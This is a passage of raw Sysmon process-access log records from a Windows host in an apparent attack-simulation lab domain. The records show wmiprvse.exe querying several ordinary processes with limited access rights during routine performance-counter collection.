Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151910Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151909Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151908Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151907Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151906Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151905Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151904Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151903Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151902Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151901Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151900Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151899Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151898Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151897Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151896Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151895Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 